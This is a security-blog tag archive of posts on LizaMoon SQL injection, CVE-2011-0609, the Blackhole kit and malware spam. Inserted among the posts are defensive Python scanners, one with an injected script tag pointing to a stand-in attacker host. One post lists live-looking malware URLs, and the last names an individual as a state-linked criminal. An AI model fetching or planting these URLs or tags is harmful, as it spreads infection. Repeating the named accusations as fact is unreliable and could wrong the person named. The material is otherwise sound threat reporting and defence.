Tag Archive | "Attack"

LizaMoon the Latest SQL-Injection Attack

Working in the security industry brings about a myriad of challenges. This is especially true for vendors. We must do our best to educate and inform. At the same time, we want to avoid laying on the FUD, or scaring customers into making poorly educated security decisions.

Which brings us to the recent LizaMoon attacks. There is an incredible amount of highly generic and vague information floating around. The fact of the matter is on-going SQL-injection attacks are a fact of life. They are not the only ones, either; every day there are mass spammings of new pieces of malware. Every week we see thousands of new “fake-alert” Trojans (a.k.a. rogue or bogus AV/security products and scams). And fake-alert is just one of the millions of static malware examples that we deal with on a constant basis.

So how should we respond? Do we toot our own horn and blast everyone with a gargantuan list of countermeasures for any and all threats? Do we wait and see how the industry reacts and then do what everyone else does?

Without getting too philosophical, I’ll cut to the chase.

What’s In a Name?

The LizaMoon attack is named after one of the domains referenced in the script code that gets injected into compromised pages.

Example: <script src=http://lizamoon[dot] com /ur[dot] php >

Lizamoon.com is not the only domain associated in this way. In the days since we started tracking this event, we have added many others. As of this writing we know of around 40 (give or take a few). If you are looking to block traffic to the malicious domains, this is where you want to focus your efforts. We have seen some recommendations to block all associated domains, even those that have been compromised (the valid sites that were victimized by the attack). This step may be overly paranoid. We do not necessarily need to block traffic to all these legitimate and well-meaning sites (by some estimates the count is up to 1.5 million) to protect against this and similar threats.

Make Me Feel Secure !

The injected scripts redirect clients to sites that are known to host fake/rogue/bogus security software. There are tens of thousands of write-ups on this fake-alert family on our Threat Intelligence site, and it’s one of the most prevalent families of static malware that we deal with.

The particular package associated with this attack is detected as follows:

Name: FakeAlert-PJ.gen.c
DAT: 6304
Release Date: April 2, 2011
Info: http://vil.nai.com/vil/content/v_348729.htm

Malicious hosts associated with this attack (for example, lizamoon.com) are categorized as malicious by our Web Reputation Service (http://mcaf.ee/92e06). Multiple McAfee products, at various layers of defense, use this intelligence to block traffic or filter out the bad stuff. McAfee Firewall Enterprise and McAfee Host Intrusion Prevention are just a few examples. More details on McAfee GTI Reputation and Categorization Services can be found here: http://mcaf.ee/92e06

The network side of the SQL-injection attack is detected through the McAfee Network Security Platform. The signatures that pick up this particular attack are approaching one year old (sig: HTTP: SQL Injection – evasion III in Releases 4.1.74, 5.1.44, and 6.1.11).

Where’s the Beef?

This is a SQL-injection attack. Before any of us blow our IT budgets on database security goodies, we must all take the basic first steps. Simple and core techniques, such as constraining user input, validating user input, limiting types of input, encrypting sensitive data, and designing accounts with the principle of least privilege will go a long, long way.



More on the “massive” SQL injection attack

Alas, the news was published on April 1st. But it is not a joke.

Curious, I spent a bit of time today researching it (when I really was supposed to be doing other things), and while the “lizamoon” URL is down, there are still a number of other URLs active on this one.

Without a lot of effort, I found infections using other URLs, which include

t6ryt56.info/ur.php
tadygus.com/ur.php
milapop.com/ur.ph
books-loader.info/ur.php

(These are all malicious, so obviously don’t go to them unless you know what you’re doing, etc.)

However, I doubt the infection is as massive as is being stated. For unique sites, perhaps a few thousand. More pages than that, but in terms of unique domains, not a million, as might have been inferred from articles.  

What’s curious is that I also found something else interesting: encoded View State with malicious URLs injected into the site.

For example, here’s a screenshot of an example encoded View State that I found on one of the injected sites.

First, an infected page (with VIPRE yelling away that there’s a problem in the corner — sorry, can’t help the shameless self-promotion).

Infected page

So let’s take a look at the page source:

[Screenshot: page source showing the encoded View State]

Yuck! What’s all that? It’s encoded View State.

So we go to a handy-dandy decoder, paste the offending text, do a little “where’s Waldo” and there you have it:

[Screenshot: decoded View State revealing the injected malicious URL]

How cool is that?

And yes, that is really painfully sloppy stuff.

Alex Eckelberry
(Obligatory hat tip to Jose)
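As an added example (not code from either post), here is a Python scanner that flags off-site script tags in two places: the raw markup, like the unquoted tag shown in the McAfee post above, and the base64-encoded __VIEWSTATE field this post describes. The sample page and the host attacker.example are constructed placeholders, not the real domains.

```python
import base64
import binascii
import re

# Matches an external <script src=...> tag, quoted or unquoted, as injected here.
SCRIPT_SRC_RE = re.compile(
    rb'<script\b[^>]*\bsrc\s*=\s*["\']?\s*(https?://[^\s"\'>]+)', re.IGNORECASE)
# Matches the hidden __VIEWSTATE field and captures its base64 value.
VIEWSTATE_RE = re.compile(
    rb'name=["\']__VIEWSTATE["\'][^>]*\bvalue=["\']([A-Za-z0-9+/=]+)["\']',
    re.IGNORECASE)


def decode_viewstate(b64: bytes) -> bytes:
    """Base64-decode a __VIEWSTATE value; returns b'' if it is not valid base64.
    Strings serialised into View State survive as plain text in the decoded
    blob, so a byte-level search is enough to spot an injected URL."""
    try:
        return base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return b''


def host_of(url: str) -> str:
    """Return the lower-cased host part of an http(s) URL."""
    return re.sub(r'^https?://', '', url).split('/')[0].lower()


def find_injected_scripts(html: bytes, own_hosts) -> list:
    """Return (location, url) for every script src that points off-site,
    looking at the raw markup and at each decoded __VIEWSTATE blob."""
    findings = []

    def check(blob: bytes, location: str) -> None:
        for m in SCRIPT_SRC_RE.finditer(blob):
            url = m.group(1).decode('latin-1')
            if host_of(url) not in own_hosts:
                findings.append((location, url))

    check(html, 'markup')
    for vs in VIEWSTATE_RE.finditer(html):
        check(decode_viewstate(vs.group(1)), '__VIEWSTATE')
    return findings


# Constructed sample page: one legitimate script, one injected tag in the
# markup (unquoted, like the tag in the McAfee post) and one hidden inside
# View State. attacker.example is a placeholder, not a real LizaMoon domain.
INJECTED = b'<script src=http://attacker.example/ur.php ></script>'
FAKE_VIEWSTATE = base64.b64encode(b'\xff\x01\x0b' + INJECTED + b'\x00')
SAMPLE_HTML = (
    b'<html><head><script src="http://www.example.com/js/app.js"></script>'
    b'</head><body><form><input type="hidden" name="__VIEWSTATE" '
    b'id="__VIEWSTATE" value="' + FAKE_VIEWSTATE + b'" /></form>'
    b'<div>' + INJECTED + b'</div></body></html>')

if __name__ == '__main__':
    for where, url in find_injected_scripts(SAMPLE_HTML, {'www.example.com'}):
        print(f'injected script in {where}: {url}')
```

Run against database-backed page content as well as rendered HTML, since in a mass SQL injection the tag lives in the stored data, not in the template.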


LizaMoon, Etc. SQL Injection Attack Still Ongoing

We’re currently monitoring a still-ongoing mass compromise involving a great number of websites. The compromised sites have been injected with a malicious script that triggers redirects to certain URLs that lead to malware such as FAKEAV.

Based on Google searches, there is no common denominator in terms of the industry to which the compromised sites belong. We saw compromised websites related to astronomy, clubs, hospitals, sports, funeral homes, electronics, and others.

More URLs Involved

Investigations revealed that five URLs were used for the attack and were inserted into the compromised sites through SQL injection. The said URLs all resolve to a single IP server—a known malicious IP Trend Micro researchers are monitoring. Thus, the related URLs have been proactively blocked by Trend Micro as early as March 25, 2011:

  • {BLOCKED}of-books.com/ur.php
  • {BLOCKED}ane.com/ur.php
  • {BLOCKED}carter.com/ur.php
  • {BLOCKED}on.com/ur.php
  • {BLOCKED}6.info/ur.php

New developments are currently being observed. We’re seeing compromised websites that were previously inserted with a script leading to {BLOCKED}on.com/ur.php already modified to connect to {BLOCKED}s.com/ur.php. The said URL also resolves to the same IP server as the four previously mentioned URLs. It is possible that the cybercriminal behind this attack is updating the compromised sites with new URLs to connect to since the previous ones are already being blocked.

Infection Chain Leads to FAKEAV and WORID

So far, the infection chain has been typical. Visiting a compromised website with the malicious script leads to any of the above-mentioned URLs, which then triggers a series of redirections, finally leading to the download of malicious files. The redirections are visible to the user, as the displayed pages show a fake antivirus scan. The scan is, of course, fake, and is the first part of the whole FAKEAV scam, followed by a prompt to download a malicious file disguised as an installer.

Retrieved samples from active instances are now detected as TROJ_FAKEAV.BBK and TROJ_WORID.A.

Web compromises such as this one are not uncommon but do pose a great threat, especially if a particular website with high incoming traffic is among those compromised. Trend Micro, through the Smart Protection Network™ protects users from being affected by this compromise, as the related malicious URLs are already blocked and the malicious files detected.

Website owners who suspect that their websites have been compromised are advised to clean up their sites as soon as possible.

Post from: TrendLabs | Malware Blog – by Trend Micro



Italian model exposed in Facebook clickjacking attack

The mere mention of anything with a sex connotation on Facebook almost always begets some major activity, with people wanting to know more. As a result, whatever the attack vector or channel might be is propagated, and the attacker is sure to get some response.


In this example a Facebook click-jacking attack jumped on the bandwagon of Italian model Marika Fruscio's unfortunate incident with a wardrobe malfunction on live TV. The title of the scam on Facebook was "The beautiful Marika Fruscio shows her breasts on Italian TV!", which almost sounds like it was staged as opposed to an accident. Whatever the theory, the interesting part of this attack is what happens when someone clicks on the provided link to watch the embedded video.


The attack seems harmless: on clicking the link, the user is directed to another page where they can view the video. While this is happening, the user's account is being exploited to post the video on their own page for further distribution. The user is also added to the list of those who like the video, which encourages others to view it. The series of steps involved is shown below.


An infected account shows the advert as being liked either by a friend or contact within your Facebook account:


The user is then directed to the page below to view the video. Unknown to the user, there are hidden elements and iframes within the HTML code, located over the Play button, which directly access the user's 'like' option within Facebook. These hidden elements are where the magic of click-jacking, or shall we say like-jacking, happens.


Innocent-looking page as seen by the user:


Riddled page with hidden elements and iframe superimposed on the Play button and various parts of the page:


On clicking the Play button, two events take place. The first is that the user's Facebook account accepts 'liking' the video, with the video being posted on their wall as a result. The second is that the video plays Marika Fruscio's wardrobe malfunction on live TV.


Below is the screen the user is presented with if they are not already logged in to Facebook:


The compromised account then displays a video link on the user's wall encouraging others to view it.


There are several possible motives for this type of attack. In this instance, although nothing overtly malicious happens, it brings to mind the elaborate ploys in which an attacker uses this technique to earn money. Pay-per-click springs to mind: attackers running these scams usually get the user to click on hidden links in order to generate many hits, which then reward the attacker with money.


Further analysis using our in-house tools on spontour.net shows the various links and how they are interconnected.


To protect yourself from attacks such as these, and also from posts like this being posted on your wall, try our free Defensio Facebook app.




Attack Using CVE-2011-0609

Attackers have been taking advantage of the situation in Japan to trick their targets into opening malicious files. These cases have used infected Excel attachments with Flash exploits.

Here’s a screenshot of one such e-mail, provided by Contagio:


The related XLS samples have these hashes:

4bb64c1da2f73da11f331a96d55d63e2
4031049fe402e8ba587583c08a25221a
d8aefd8e3c96a56123cd5f07192b7369
7ca4ab177f480503653702b33366111f

We detect them as Exploit.CVE-2011-0609.A and Exploit:W32/XcelDrop.F.

Another sample we’ve seen (md5:20ee090487ce1a670c192f9ac18c9d18) is an Excel file containing an embedded Flash object that exploits a known vulnerability (CVE-2011-0609). When the XLS file is opened, it shows an empty Excel spreadsheet and starts exploit code via a Flash object.

The Flash object starts by doing a heap-spray containing the following shellcode:

[Screenshot: the heap-spray shellcode]

This first shellcode only loads and passes execution to a second shellcode embedded in the Excel file:

[Screenshot: the first-stage shellcode]

The second shellcode is responsible for decrypting and executing an EXE file (also embedded in the Excel file):

[Screenshots: the second shellcode, and the embedded EXE viewed in Hiew]

In the meantime, the Flash object constructs and loads a second Flash object in runtime:

[Screenshot: the Flash object constructing the second Flash object at runtime]

This second Flash object is the main exploit in this malware and it exploits CVE-2011-0609 to execute the shellcode in the heap. We generically detect the Flash object as Exploit.CVE-2011-0609.A.

As an aside: the main exploit appears to have been delivered in this fashion in an attempt to evade detection. As it is loaded in memory, no physical file is available for scanning by an antivirus engine. Embedding the Flash object that loads the main exploit in an Excel file may be an attempt to further disguise the attack.

Fortunately, the malicious Excel file and its embedded EXE file are detected as Exploit.D-Encrypted.Gen and Trojan.Agent.ARKJ, respectively.

Still, users should update their Flash player as Adobe has already released a patch for this particular vulnerability. For more information, please see their security advisory for CVE-2011-0609.

Threat Solutions post by — Broderick

On 23/03/11 At 02:55 AM
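The post describes a Flash object embedded inside an Excel file as the carrier for the exploit. As an added example (not F-Secure's tooling), the Python below carves embedded SWF objects out of an arbitrary container by locating the FWS/CWS signatures and validating the header, including inflating a compressed CWS body to find its extent on disk. The OLE2-like container and both SWFs are constructed in the block and contain no exploit.

```python
import struct
import zlib

SWF_SIGNATURES = (b'FWS', b'CWS')   # uncompressed / zlib-compressed SWF


def parse_swf_header(data: bytes, offset: int):
    """Validate a candidate SWF header at offset.

    Returns a dict describing the embedded SWF, or None if the bytes only look
    like a signature by chance (implausible version, length past end of data,
    or a CWS body that does not inflate to the declared size)."""
    if len(data) < offset + 8:
        return None
    sig = data[offset:offset + 3]
    version = data[offset + 3]
    length = struct.unpack_from('<I', data, offset + 4)[0]  # uncompressed size incl. header
    if sig not in SWF_SIGNATURES or not 1 <= version <= 40 or length < 8:
        return None
    body = data[offset + 8:]
    if sig == b'FWS':
        if length > 8 + len(body):
            return None
        return {'offset': offset, 'compressed': False, 'version': version,
                'uncompressed_length': length, 'size_on_disk': length}
    inflater = zlib.decompressobj()
    try:
        inflated = inflater.decompress(body)
    except zlib.error:
        return None
    if len(inflated) + 8 != length:
        return None
    consumed = len(body) - len(inflater.unused_data)   # bytes the zlib stream used
    return {'offset': offset, 'compressed': True, 'version': version,
            'uncompressed_length': length, 'size_on_disk': 8 + consumed}


def find_embedded_swf(data: bytes) -> list:
    """Carve every plausible SWF from an arbitrary container (e.g. an OLE2 .xls)."""
    findings = []
    pos = 0
    while True:
        hits = [i for i in (data.find(sig, pos) for sig in SWF_SIGNATURES) if i != -1]
        if not hits:
            return findings
        offset = min(hits)
        info = parse_swf_header(data, offset)
        if info is None:
            pos = offset + 1                      # false alarm; keep scanning
            continue
        findings.append(info)
        pos = offset + info['size_on_disk']       # skip over the carved object


def build_swf(compress: bool) -> bytes:
    """Construct a minimal, harmless SWF (version 10, one empty frame)."""
    body = (bytes.fromhex('7800055f00000fa000')   # RECT: 550x400 stage
            + b'\x00\x0c'                          # frame rate 12.0 (8.8 fixed)
            + b'\x01\x00'                          # frame count 1
            + b'\x00\x00')                         # End tag
    header = (b'CWS' if compress else b'FWS') + bytes([10]) + struct.pack('<I', 8 + len(body))
    return header + (zlib.compress(body) if compress else body)


# Constructed container: OLE2 magic plus filler, an uncompressed SWF, a decoy
# "FWS" with an impossible version byte, and a compressed SWF at the end.
OLE_PREFIX = b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1' + b'\x00' * 56
FWS_SAMPLE = build_swf(False)
CWS_SAMPLE = build_swf(True)
DECOY = b'FWS\xff' + b'\xff' * 4
SAMPLE_XLS = OLE_PREFIX + FWS_SAMPLE + b'\x00' * 16 + DECOY + b'\x00' * 16 + CWS_SAMPLE

if __name__ == '__main__':
    for hit in find_embedded_swf(SAMPLE_XLS):
        print(hit)
```

A real .xls stores the Flash object inside the OLE2 stream structure, so run this over the raw file bytes; offsets reported are relative to the file start.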



Phishing Attack Uses Fake Donation Website

Earlier today, we found a phishing site that poses as a donation site to raise money for the victims of the recent earthquake in Japan. The phishing site http://www.japan{BLOCKED}.com is created by using an open-source social networking system Jcow 4.2.1. It is hosted on the IP address 50.61.{BLOCKED}.{BLOCKED}, which is located in the United States. We’ve confirmed that the site is still active as of this writing.


Aside from hosting a phishing site, the cybercriminals behind this attack also abused the blog function of the website and inserted advertisement-looking posts, possibly to increase the site’s SEO ranking.


Such attacks are not uncommon: we have previously documented instances that leveraged natural disasters such as Hurricane Katrina in 2005, Hurricane Gustav in 2008, the Sichuan earthquake in China in 2008 and, most recently, the Haiti earthquake in 2010.

Users should remember to choose trustworthy organizations when it comes to handing over their donations.

The Trend Micro™ Smart Protection Network™, through its Web reputation technology, already blocks access to this phishing site even if a user is duped into clicking its link.


Post from: TrendLabs | Malware Blog – by Trend Micro




Anatomy of an Attack: Dallas, TX and Louisville, KY

It is with great joy that I announce the next two live Anatomy of an Attack events we will be delivering in Dallas, TX and Louisville, KY.

What is Anatomy of an Attack? It’s a half-day seminar where I present a complete look inside the malware economy. I explain the what, who, how and why driving this crazy cat-and-mouse game.

In addition to sharing the stories behind the latest and most notorious attacks and the personalities behind them, I also demonstrate some live malware to show the methods being used by our adversaries.

Of course we don’t leave you hanging. I provide tips on how to take advantage of free tools and your existing investment in security software to defend yourself against the majority of attacks that I cover in the seminar.

If you live in Dallas, please register and join us on Wednesday, March 2nd at the Dallas Marriott City Center.

Those of you in Louisville can register to attend our event at the Seelbach Hilton on Wednesday, March 9th.
I sincerely look forward to meeting those who are able to attend. For those of you elsewhere in the world, check our list of upcoming events or watch our educational videos that show a sample of the content we present.



Data leakage and dictionary attack stories from RSA

Last year, I wrote several Naked Security articles about computer security problems which can put travellers in harm’s way. The topics I covered were:

* The free WiFi service at San Francisco airport with Terms and Conditions which authorised the network operator to access your device and the information stored on it.

* The no-responsibility-for-your-property attitude of the private security company at Canberra airport – a company which nevertheless insists on separating you from your laptop for an indeterminate amount of time during screening.

* The chap at Sydney airport who used a kiosk computer in the Qantas lounge and left behind a veritable audit trail of personal email information – including his name, employer, job and details of recent business meetings.

* Paul Craig’s live demonstration at Kiwicon of the woeful insecurity of many internet kiosks, even if you avoid the self-inflicted data leakage problems of the previous story by clearing browser history and logging out when you’re finished.

I’m now on my way back from the RSA conference in San Francisco – where I can tell you that the WiFi Terms and Conditions at the airport are still as onerous as they were last year – with an amusing fifth anecdote to add to my Travellers Beware series.

The crumpled-up PostIt note you see above was dropped in the lobby of one of the big hotels near the Moscone Center, the outsized conference venue near Union Square at which the RSA event is held.

The note doesn’t record the name of the person whose BlackBerry Enterprise Server connection it relates to. But conference delegates have a habit of leaving their nametags on, even back at the hotel. This seems to be a subcultural nicety of the conference circuit.

So you can often tie discarded data fragments – such as the pictured PostIt – back to a company, and in many cases, to an individual. (It’s not even rude if you’re caught trying to make out someone’s nametag across the lobby. That’s what nametags are for, after all.)

Making that sort of connection converts raw data into PII, or Personally Identifiable Information. And PII really needs to be kept private.

Don’t let yourself fall into bad data leakage habits whilst you’re on the road. And data doesn’t just leak from electronic devices such as laptops and phones. Hastily scribbled notes, memos to yourself and carelessly discarded invoices and tickets can help identity thieves to accumulate PII which they can abuse or sell on at a later stage.

And please choose decent passwords. If you’re a sysadmin, don’t fall into the habit of choosing trivial passwords because they’re easier to read out to users when they’re on the road. (As an aside, teach yourself and your fellow administrators the NATO Phonetic Alphabet and you’ll find it much easier to describe arcane command lines and to read out complex passwords.)

The password in the pictured example is especially amusing. It brings a whole new excitement to the concept of a dictionary attack, since a (and not aardvark, as popularly imagined) is always the very first entry in any dictionary of the English language.

Watch how to choose a decent password here:

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like.)

If you’re concerned about privacy – your own and that of your valued customers – why not download our free Data Security toolkit?



RSA Conference 2011 – Live Malware Attack, and Most Educational Security Blog!

Apologies to our readers from me and from Chester Wisniewski – we haven’t written anything for Naked Security for the past week or so.

That’s because we’ve been off the air, and on our feet, for the past few days, attending the RSA 2011 conference in San Francisco.

Actually, we haven’t been attending the conference. We’ve been on the Sophos booth at the RSA Expo which happens alongside the conference – and mere exhibitors aren’t allowed into the conference sessions. Not that we’d have been able to attend anyway, because the booth has been really busy.

Chester and I have been giving presentations on a regular and frequent basis: a Live Malware Attack from me, showing how JavaScript-borne malware sneaks into your network, and The Money Behind the Malware from Chester, explaining why cybercrooks put so much effort into their criminal activities.

The presentations were a big hit – some kind participants even went so far as to say they’d enjoyed them more than the papers they’d heard in the conference proper! – and gathered big crowds.

In fact, we heard through the grapevine that we may have been too successful, overflowing our booth into the aisles. (Apparently, it’s also dangerous to throw T-shirts to the audience lest the sharp edges cause injury. Sorry about that.)

But the really great moment came yesterday evening, when Chester and I went to the RSA 2011 Security Bloggers meetup. We’d been shortlisted for two awards; we were both surprised and delighted to walk away as the Most Educational Security Blog for 2011.

Of course, a large part of our ability to be educational on Naked Security is down to you, our readers.

We receive an astonishing range of suggestions, corrections, updates, alerts and useful advice via the Naked Security email address tips@sophos.com.

We really value your comments – thanks, and keep them coming!

Oh, and please take a listen to this week’s Sophos Security Chet Chat – Chester’s excellent weekly podcast, now in its 48th week – which was recorded live on the show floor at RSA. Share with us in some of the weirder and more wonderful aspects of the event.



“porn sex free site” spam attack on .edu sites

There seems to be a rather nasty spamrun taking place on many .edu sites hosting forums at the moment. Filtering out lurid trackback spam and genuine .Edu articles about pornography in various search engines reveals pages and pages of forum spam, dubious keywords and sites that currently look like this:

[Screenshot: one of the spammed .edu forum pages]

As you can imagine, the shot above is one of the tamer spamruns.

Elsewhere, you have the kind of pages that induce headaches for bloggers hovering their fingers over the “blank this out” key:

[Screenshot: a far more explicit spammed forum page]

Notice that 45 people have hit the “Like” button – I’m hoping those are spam accounts and not regular forum users.

Most of this seems to have kicked in since around the 4th or 5th of February, and there doesn’t seem to be much in the way of spam control or preventative measures going on right now so please be careful if looking around your University forums, official or otherwise. While not everything in the below screenshot is related to this spamrun, it should give you an idea of the kinds of things in circulation:

[Screenshot: keywords currently in circulation in the spamrun]

The sites currently being targeted desperately need to take control of the situation – if things continue as they are, I can’t imagine many users being persuaded to stick around…

Christopher Boyd



Spammer’s blunder leads to widespread split personality malware attack

We’re seeing a widespread malware attack in our spam traps this morning – and what’s making it unusual is that it appears not to be able to decide what it is.

When you first see the subject line, you imagine it’s going to be another “undelivered parcel” attack:

United Parcel Service notification #49674

(the tracking number changes in each email)

And the fact that it uses an @ups.com email address doesn’t do anything to make you think it won’t be another addition to the long line of malware attacks that are spammed out pretending to come from the likes of UPS, FedEx or DHL.

Things get a little weird, however, when you look at the email’s content.

[Screenshot: the FDIC/UPS malicious email]

The message, embedded as an image inside the email, claims to come from the Federal Deposit Insurance Corporation (FDIC).

It claims that there are “important changes in current regulations of endowment insurance procedure” that you should look through, and is signed – with “best regards” from the “Federal Deposit Insurance Corporation Investors Relations Department”.

What a strange email!

On one hand it claims to be from UPS about a delivery, and with a split personality it then claims to be a message from FDIC! The attached file appears to keep up the pretence of being FDIC-related – it’s called FDIC_Document.zip.

Beware opening the ZIP file, however. It contains a malicious file called FDIC_Document.exe. Sophos is adding detection of the malware as Troj/Bredo-FA.

This malicious spam campaign is widespread right now, hitting inboxes around the world. Hopefully the cybercriminal’s botched job will stop some people opening the attachment, as its subject line and ‘from’ address are so clearly out of kilter with its email body.

But no doubt there are some folks who will be so puzzled by this email’s split personality that they’ll investigate the attached file, and end up with an infected Windows computer.


Blackhole exploits kit attack growing

Recently, we have seen an increase in Blackhole exploit kit attacks. Blackhole is yet another web exploit kit developed by Russian hackers. According to one forum, the author indicates that the kit costs $1,500 annually, $1,000 for a half-year and $700 for three months. It is a very powerful kit with a number of recent exploits, including Java and Adobe PDF exploits. The attacker has continually improved the kit with more obfuscation and crypto algorithms to avoid detection by AV vendors. One line from the kit’s description says it all: “Exploits crypt on special algorithms that make it impossible to code analysis and detection of anti-virus as well as services,Tipo wepawet and other counterparts …”.

Analysis of this malicious toolkit showed that URL patterns remain the same for most of the malicious domains hosting the Blackhole exploit kit. A Google search for the URL patterns returns thousands of results for such domains, and Google does generally flag them as malicious. Here is a screenshot of the Google search:

The exploit kit sends heavily obfuscated JavaScript code with Java applet code, which will download a malicious JAR file to the system. Here is what the code looks like:

The above JavaScript code is formatted for better viewing. It is heavily obfuscated to avoid antivirus detection. If we decode the content, we see that the kit is targeting a recent vulnerability in Java. The VirusTotal result for the above “.jar” file is very poor, with only 2 antivirus engines triggering on it. Here is the decoded part of the script:

The above decoded JavaScript targets CVE-2009-1671. It will download a malicious binary called “info.exe” from the server and execute it on the system. The VirusTotal result for this file remains poor at only 47%. There is also another iframe attack in the decoded JavaScript code.

The above code appends a malicious iframe to the body of the webpage, pointing to another malicious URL. That URL in turn serves yet another malicious URL inside an ASX file. This is intentionally done to avoid a user prompt. Here is the source:

This URL then sends more obfuscated JavaScript code exactly like the second image of the blog. Once decoded it shows JavaScript code which targets CVE-2010-1885. Here is the decoded script,


We have seen many similar web exploit kits in the past, and attackers keep coming up with new ones like Blackhole with more features and more reliable, harder-to-detect exploits. We are also seeing a large number of malicious domains hosting the Blackhole exploit kit. The detection ratio is generally very poor for the malicious binaries contained in the kits. Even though the price of this exploit kit is high, it remains a sought-after commodity.

Umesh



Hei Man: Scandinavian spam attack spreads Trojan horse

Sophos is intercepting a malicious spam attack which attempts to infect recipients’ computers with a Trojan horse by pretending to contain images of the Scandinavian sender.

Here is what a typical malicious email looks like:


Subject: Hei Man,
From: "Facebook"<info@hi5.com>
Attached file: Image123.zip

Message body:
Hei Man,

Jeg vet ikke hvordan jeg skal si det, men jeg har prøvde før en lang tid til å sende deg noen bilder, men jeg har tenkt at du ikke er interessert i å se meg.
Men nå skal jeg sende deg bilder i vedlegg.
Last ned bilder og trekke ut de, er jeg sikker på at du vil like de. Passordet er: 123456

Ha en flott dag.

The message, which appears to be written in Norwegian, roughly translates to:

Hey Man,

I do not know how to say it, but I have tried for a long time to send you some pictures, but I've been thinking that you are not interested in seeing me.
But now I'll send you pictures in the attachment.
Download the images and extract them, I'm sure that you will like them. The password is: 123456

Have a great day.

The attached file, named Image123.zip, is encrypted – presumably in an attempt to avoid detection by weaker anti-virus products – but the email message contains the password to unlock the ZIP and reveal the malware to you.

Of course, an attack like this is only likely to trick users who speak Norwegian (or its close linguistic neighbour Danish), but you can imagine how a message claiming to come from a Facebook or Hi5 friend might trick some people into checking out what hides behind the ZIP without thinking.

Sophos detects the Trojan horse proactively as Mal/Behav-043 and is adding detection of the ZIP file as Troj/BredoZp-BU.
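The evasion described here, an encrypted ZIP with the password handed over in the message body, is easy to spot at the mail gateway. As an added example (not Sophos code), the Python below parses a message, checks each attachment for the ZIP encryption flag and looks for a password announcement in the body in the languages this lure used. The message and the archive are constructed; since zipfile cannot write encrypted archives, the fixture sets the encryption flag bit on a plain one.

```python
import io
import re
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage

# Phrases announcing an archive password, as in "Passordet er: 123456" /
# "The password is: 123456". Captures the token that follows.
PASSWORD_HINT_RE = re.compile(
    r'\b(?:password|passordet|passord)\b\s*(?:is|er)?\s*[:=]?\s*(\S+)',
    re.IGNORECASE)


def is_encrypted_zip(data: bytes) -> bool:
    """True if data is a ZIP with at least one encrypted entry (bit 0 of the
    general-purpose flag). Non-ZIP data returns False."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(zi.flag_bits & 0x1 for zi in zf.infolist())
    except zipfile.BadZipFile:
        return False


def scan_message(raw: bytes) -> dict:
    """Gateway check: encrypted ZIP attachment plus a password in the body."""
    msg = message_from_bytes(raw, policy=policy.default)
    body_part = msg.get_body(preferencelist=('plain',))
    body = body_part.get_content() if body_part is not None else ''
    hint = PASSWORD_HINT_RE.search(body)
    encrypted = [part.get_filename() or '(unnamed)'
                 for part in msg.iter_attachments()
                 if is_encrypted_zip(part.get_payload(decode=True) or b'')]
    return {'encrypted_zips': encrypted,
            'password_hint': hint.group(1) if hint else None,
            'quarantine': bool(encrypted) and hint is not None}


def build_zip_fixture(encrypted: bool) -> bytes:
    """Constructed archive. The member is a harmless stand-in, not a real EXE.
    For the encrypted variant, set bit 0 of the general-purpose flag in the
    local file header (+6) and the central directory entry (+8)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('Image123.exe', b'MZ' + b'\x00' * 30)
    data = bytearray(buf.getvalue())
    if encrypted:
        data[data.index(b'PK\x03\x04') + 6] |= 0x01
        data[data.index(b'PK\x01\x02') + 8] |= 0x01
    return bytes(data)


def build_sample_email(with_password: bool = True) -> bytes:
    """Constructed lure modelled on the message quoted above."""
    msg = EmailMessage()
    msg['Subject'] = 'Hei Man,'
    msg['From'] = '"Facebook" <info@hi5.com>'
    msg['To'] = 'victim@example.com'
    lines = ['Hei Man,', '', 'Jeg sender deg noen bilder i vedlegg.',
             'Last ned bilder og trekke ut de.']
    if with_password:
        lines.append('Passordet er: 123456')
    lines += ['', 'Ha en flott dag.']
    msg.set_content('\n'.join(lines) + '\n')
    msg.add_attachment(build_zip_fixture(True), maintype='application',
                       subtype='zip', filename='Image123.zip')
    return msg.as_bytes()

if __name__ == '__main__':
    print(scan_message(build_sample_email()))
```

An encrypted archive with no password in the body is still worth flagging on its own; the combination just raises the confidence enough to quarantine outright.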


Russians Stage Large-scale, Successful Attack on U.S. and State Governments Computers


The Criminal Behind the Attack

Brian Krebs today posted a story on his excellent blog, “Zeus Attack Spoofs NSA, Targets .gov and .mil” (http://www.krebsonsecurity.com/2010/02/zeus-attack-spoofs-nsa-targets-gov-and-mil/) which discusses an attack in which “a relatively large number of recipients were taken in”.

The messages are spoofed so that they appear to have been sent by the National Intelligence Council (address used was nic@nsa.gov), which serves as the center for midterm and long-range strategic thinking for the U.S. intelligence community and reports to the office of the Director of National Intelligence. The infecting file is detected by less than half of all anti-virus programs, but allows the attackers to steal passwords and remotely control the infected computers. The state government agency that Brian Krebs’ “source works at has already confirmed ‘a couple hundred’ infections at their site”.

The email containing the spoofed message originated from nobody@sh16.ruskyhost.ru. sh16.ruskyhost.ru is at IP address 174.36.194.156, which is leased by long-time Russian cyber criminal Nikolai Lidiaev. It should be noted that less than two years ago, Nikolai Lidiaev launched an attack against the customers of Wachovia financial services from the email account “nobody@sh5.slavhost.com”. ruskyhost.ru and slavhost.com are duplicated, overlapping servers.

Russian criminals operate as privateers against the West; receiving rewards from Russian intelligence for information acquired during criminal operations against the West. They are also allowed to keep what they are able to steal.

The irony is that Mr. Lidiaev’s servers are based in the United States, not Russia. The United States should shut down his criminal operation. His IP addresses follow:

network:IP-Network-Block:173.192.194.192-173.192.194.223
network:Organization;I:Nikolai Lidiaev

Malware: 173.192.194.192 kpip.ru PHP/Small.F

network:IP-Network-Block:174.36.167.20-174.36.167.23
network:Organization;I:Nikolai Lidiaev

174.36.167.20 ns4.ruskyhost.net name server for malware domains

network:IP-Network-Block:174.36.194.152-174.36.194.159
network:Organization;I:Nikolai Lidiaev

174.36.194.154 sh14.ruskyhost.ru (reverse for 174.36.195.192)

174.36.194.156 sh16.ruskyhost.ru Attacker of .gov and .mil domains
sh16.ruskyhost.ru ptr 174.36.221.128
(174.36.221.128 reverse entry is sh16.ruskyhost.ru)
Domains on 174.36.221.128 include ebay typosquatters, rape sites, underage sex sites, and illegal pharmacy sites.

174.36.194.158 sh18.ruskyhost.ru reverse for 174.37.217.96 (illegal pharmacy, scam and porn sites)

